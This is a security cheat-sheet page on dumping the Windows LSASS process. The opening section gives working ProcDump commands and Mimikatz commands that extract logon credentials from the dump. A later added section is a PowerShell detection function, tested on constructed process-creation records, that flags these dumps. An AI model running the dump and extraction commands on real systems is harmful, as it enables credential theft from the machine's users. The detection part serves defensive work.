# LSASS DUMP

ProcDump - <https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>

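Run `procdump.exe` with **local administrator privileges** to dump the **lsass.exe** process. The first command writes a full memory dump (`-ma`); the second adds `-r` to take the dump from a clone of the process.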

```powershell
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

```powershell
.\procdump.exe -r -ma lsass.exe lsass.dmp
```

After copying the `lsass.dmp` dump file to your local machine, use Mimikatz's `sekurlsa::minidump` to load it and extract secrets:

```
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords /all
```
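
From the defender's side, the two ProcDump invocations above leave a recognisable process-creation command line. The following is an added detection example, not part of the original page: the function name, record layout, hosts and paths are assumptions made for illustration, and the sample records are constructed.

```powershell
# Added example (not from the original page): flag process-creation command
# lines that match the ProcDump invocations above (full dump of lsass.exe).
function Test-LsassDumpCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Split on whitespace, strip surrounding quotes, normalise case.
    $tokens = @($CommandLine -split '\s+' | Where-Object { $_ } |
        ForEach-Object { $_.Trim('"').ToLowerInvariant() })

    # Treat both -x and /x as switch prefixes; keep the switch name only.
    $switches = @($tokens | Where-Object { $_ -match '^[-/].' } |
        ForEach-Object { $_.Substring(1) })

    # Target must be the process name itself, not a file such as lsass.dmp.
    $targetsLsass = @($tokens | Where-Object { $_ -match '^lsass(\.exe)?$' }).Count -gt 0

    [pscustomobject]@{
        FullDumpOfLsass = ($switches -contains 'ma') -and $targetsLsass
        UsesClone       = $switches -contains 'r'
    }
}

# Constructed process-creation records (for example the command-line field of
# Security event 4688 or Sysmon event 1); hosts and paths are made up.
$records = @(
    [pscustomobject]@{ Computer = 'WS01'; CommandLine = '.\procdump.exe -accepteula -ma lsass.exe lsass.dmp' }
    [pscustomobject]@{ Computer = 'WS02'; CommandLine = 'C:\Tools\procdump64.exe -r -ma lsass.exe lsass.dmp' }
    [pscustomobject]@{ Computer = 'WS03'; CommandLine = 'procdump.exe -ma notepad.exe lsass.dmp' }
    [pscustomobject]@{ Computer = 'WS04'; CommandLine = 'procdump.exe -accepteula -e w3wp.exe crash.dmp' }
)

$records | ForEach-Object {
    $verdict = Test-LsassDumpCommandLine -CommandLine $_.CommandLine
    [pscustomobject]@{
        Computer        = $_.Computer
        FullDumpOfLsass = $verdict.FullDumpOfLsass
        UsesClone       = $verdict.UsesClone
        CommandLine     = $_.CommandLine
    }
} | Format-Table -AutoSize
```

Only WS01 and WS02 are flagged; WS03 dumps a different process to a file that merely has `lsass` in its name. Matching on command lines requires process-creation logging with command-line capture enabled on the endpoint.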

